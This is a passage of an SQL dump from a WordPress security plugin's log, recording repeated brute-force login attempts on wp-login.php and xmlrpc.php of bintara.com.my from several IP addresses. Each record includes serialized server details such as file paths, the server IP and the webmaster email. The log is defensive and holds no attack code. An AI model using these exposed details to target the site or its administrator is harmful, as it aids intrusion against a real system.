Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.32.126\";s:11:\"REMOTE_PORT\";s:5:\"42796\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAHJmShanGhHYaqyCTVVgAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568671526.9795\";s:12:\"REQUEST_TIME\";s:10:\"1568671526\";}}','notice','2019-09-16 22:05:28','2019-09-16 22:05:27',17741344,19231776,'https://bintara.com.my/wp-login.php',1,0,'94.23.32.126'),(24293,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.32.126\";s:11:\"REMOTE_PORT\";s:5:\"43340\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAHKWShanGhHYaqyCTVWQAAAAc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568671529.6633\";s:12:\"REQUEST_TIME\";s:10:\"1568671529\";}}','notice','2019-09-16 22:05:31','2019-09-16 22:05:30',18259680,19558368,'https://bintara.com.my/xmlrpc.php',1,0,'94.23.32.126'),(24294,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"138.68.24.138\";s:11:\"REMOTE_PORT\";s:5:\"36176\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAId2kPXSyJlCUJQmotkgAAAYQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568671863.2494\";s:12:\"REQUEST_TIME\";s:10:\"1568671863\";}}','notice','2019-09-16 22:11:04','2019-09-16 22:11:03',17744192,19234944,'https://bintara.com.my/wp-login.php',1,0,'138.68.24.138'),(24295,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"138.68.24.138\";s:11:\"REMOTE_PORT\";s:5:\"36996\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAIemShanGhHYaqyCTXDgAAABA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568671866.2151\";s:12:\"REQUEST_TIME\";s:10:\"1568671866\";}}','notice','2019-09-16 22:11:07','2019-09-16 22:11:06',18260368,19558504,'https://bintara.com.my/xmlrpc.php',1,0,'138.68.24.138'),(24296,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"150.164.122.1\";s:11:\"REMOTE_PORT\";s:5:\"41158\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAJ2GShanGhHYaqyCTYdQAAABE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568672217.0011\";s:12:\"REQUEST_TIME\";s:10:\"1568672217\";}}','notice','2019-09-16 22:16:58','2019-09-16 22:16:57',17740528,19230520,'https://bintara.com.my/wp-login.php',1,0,'150.164.122.1'),(24297,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"150.164.122.1\";s:11:\"REMOTE_PORT\";s:5:\"41628\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAJ3GShanGhHYaqyCTYeQAAAAY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568672220.4488\";s:12:\"REQUEST_TIME\";s:10:\"1568672220\";}}','notice','2019-09-16 22:17:01','2019-09-16 22:17:00',18260408,19558504,'https://bintara.com.my/xmlrpc.php',1,0,'150.164.122.1'),(24298,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"45.252.248.161\";s:11:\"REMOTE_PORT\";s:5:\"53112\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAMLmShanGhHYaqyCTaiQAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568672814.8269\";s:12:\"REQUEST_TIME\";s:10:\"1568672814\";}}','notice','2019-09-16 22:26:56','2019-09-16 22:26:55',17740944,19231976,'https://bintara.com.my/wp-login.php',1,0,'45.252.248.161'),(24299,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"45.252.248.161\";s:11:\"REMOTE_PORT\";s:5:\"53634\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAMMWShanGhHYaqyCTaigAAAAU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568672817.1961\";s:12:\"REQUEST_TIME\";s:10:\"1568672817\";}}','notice','2019-09-16 22:26:58','2019-09-16 22:26:57',18260680,19560496,'https://bintara.com.my/xmlrpc.php',1,0,'45.252.248.161'),(24300,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.171.46\";s:11:\"REMOTE_PORT\";s:5:\"13489\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYAN8w99C9j9bhK9Kpk6kAAAAQ4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568673267.3333\";s:12:\"REQUEST_TIME\";s:10:\"1568673267\";}}','notice','2019-09-16 22:34:28','2019-09-16 22:34:27',17741112,19232264,'https://bintara.com.my/wp-login.php',1,0,'139.59.171.46'),(24301,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 